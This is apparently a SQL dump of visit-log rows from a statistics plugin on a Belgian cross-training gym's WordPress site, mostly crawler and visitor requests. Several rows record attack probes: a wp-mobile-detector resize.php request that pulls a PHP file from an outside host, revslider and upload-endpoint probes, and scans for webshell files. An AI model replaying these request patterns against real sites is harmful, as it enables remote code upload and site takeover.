(74707, 1496862884.372441, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74708, 1496863432.073009, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74709, 1496863990.910574, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74710, 1496864537.874083, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74711, 1496865104.503416, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74712, 1496865675.121302, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74713, 1496865692.572303, 1247137892, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(74714, 1496865712.714439, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74715, 1496866220.275447, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74716, 1496866826.095522, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74717, 1496867253.886392, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74718, 1496867420.967590, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74719, 1496868044.866630, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74720, 1496868618.937326, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74721, 1496869157.143790, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74722, 1496869688.054496, 1439301535, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/16.0.124986583 Mobile/13F69 Safari/600.1.4'),
(74723, 1496869709.872543, 1439301535, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/16.0.124986583 Mobile/13F69 Safari/600.1.4'),
(74724, 1496869735.262109, 1439301535, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/16.0.124986583 Mobile/13F69 Safari/600.1.4'),
(74725, 1496869744.503907, 1439301535, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/16.0.124986583 Mobile/13F69 Safari/600.1.4'),
(74726, 1496869800.387827, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74727, 1496870105.487920, 1570674771, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74728, 1496870109.293732, 1570674771, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74729, 1496870578.853658, 1123634116, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74730, 1496879556.144732, 1338304941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74731, 1496884591.035000, 3373404845, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(74732, 1496884592.469028, 3373404845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.laptopscreenrepair.net.au/search/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(74733, 1496884593.277776, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/cache/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(74734, 1496884595.097453, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(74735, 1496885362.037199, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74736, 1496885692.530829, 1837270443, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1; HUAWEI CUN-L21 Build/HUAWEICUN-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74737, 1496885696.214880, 1837270443, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 5.1; HUAWEI CUN-L21 Build/HUAWEICUN-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74738, 1496885718.954252, 1837270443, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 5.1; HUAWEI CUN-L21 Build/HUAWEICUN-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74739, 1496885782.459572, 1837270443, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 5.1; HUAWEI CUN-L21 Build/HUAWEICUN-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74740, 1496889350.732050, 2731721858, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74741, 1496889354.610656, 2731721858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74742, 1496889356.549488, 2731721858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74743, 1496902012.822054, 856654116, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/jm-ajax/upload_file/', '', 'Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(74744, 1496904687.380165, 2065606982, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/blog/xmlrpc.php', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(74745, 1496909943.094279, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74746, 1496911032.318384, 1600967971, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74747, 1496911035.182964, 621375768, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74748, 1496917912.746476, 3267064321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.bing.com/search?q=cross+training+namur&src=IE-SearchBox&FORM=IENTSR', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74749, 1496917914.109430, 3267064321, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(74750, 1496919412.471942, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74751, 1496926789.050219, 872366346, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74752, 1496926808.406423, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74753, 1496930605.296766, 3495573956, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(74754, 1496938217.407041, 2637637389, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74755, 1496938217.861445, 2637637389, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74756, 1496939584.483813, 1570674744, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74757, 1496942113.539377, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74758, 1496942114.026457, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74759, 1496943323.685123, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74760, 1496943867.647117, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74761, 1496943868.185736, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74762, 1496943868.696288, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74763, 1496943869.150871, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74764, 1496943869.582761, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74765, 1496943870.088653, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74766, 1496943870.737968, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74767, 1496943871.178570, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74768, 1496943871.622446, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74769, 1496943872.083813, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74770, 1496943872.600037, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74771, 1496943997.962253, 2509963133, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(74772, 1496946693.097895, 1123633936, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74773, 1496958648.829894, 856638264, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/jm-ajax/upload_file/', '', 'Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(74774, 1496959447.404049, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(74775, 1496959448.041430, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(74776, 1496960239.086368, 2077123573, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'),
(74777, 1496963232.017787, 3024883461, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74778, 1496967919.472142, 1123634307, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74779, 1496967920.998855, 1123631626, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74780, 1496981443.894521, 2637637402, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74781, 1496981443.897780, 2637637402, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74782, 1496987838.223980, 3475901784, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74783, 1496987935.086766, 3475901784, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74784, 1496989546.066659, 2760155418, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74785, 1496990575.163523, 3154458345, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74786, 1496990575.876245, 3154458345, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74787, 1496990576.391382, 3154458345, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74788, 1496990576.872724, 3154458345, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74789, 1496990577.329444, 3154458345, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74790, 1496990578.441344, 3154458345, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74791, 1496990578.977066, 3154458345, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74792, 1496990579.442644, 3154458345, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74793, 1496990579.878652, 3154458345, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74794, 1496990580.357904, 3154458345, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74795, 1496990580.794089, 3154458345, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74796, 1496998135.618787, 3649587542, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0'),
(74797, 1496998137.267066, 3649587542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0'),
(74798, 1497005913.570310, 3427775491, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)'),
(74799, 1497016115.792046, 867140598, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)'),
(74800, 1497016376.639953, 136172254, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(74801, 1497024139.085580, 786802756, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(74802, 1497024724.544537, 2637637377, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74803, 1497024725.111390, 2637637377, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74804, 1497028085.839264, 2760155805, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74805, 1497028943.089166, 3645214530, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(74806, 1497028948.874748, 3645214527, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(74807, 1497033661.810585, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74808, 1497034543.907672, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74809, 1497036163.523000, 1837875234, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(74810, 1497042272.580413, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(74811, 1497042276.158871, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(74812, 1497042285.940925, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(74813, 1497042290.618797, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(74814, 1497042295.275037, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(74815, 1497042299.993515, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(74816, 1497042304.729241, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(74817, 1497042310.029616, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(74818, 1497056294.843138, 1091807106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/hsgcxbf.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74819, 1497056311.468927, 1091807106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/prv8.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74820, 1497056315.054176, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/lol.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74821, 1497056323.603293, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Wpwcwjqs.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74822, 1497056327.260389, 1091807106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/ashdusc.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74823, 1497056330.495042, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Maggis.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74824, 1497056334.245888, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/imnus.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74825, 1497056338.201967, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Co0ds.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
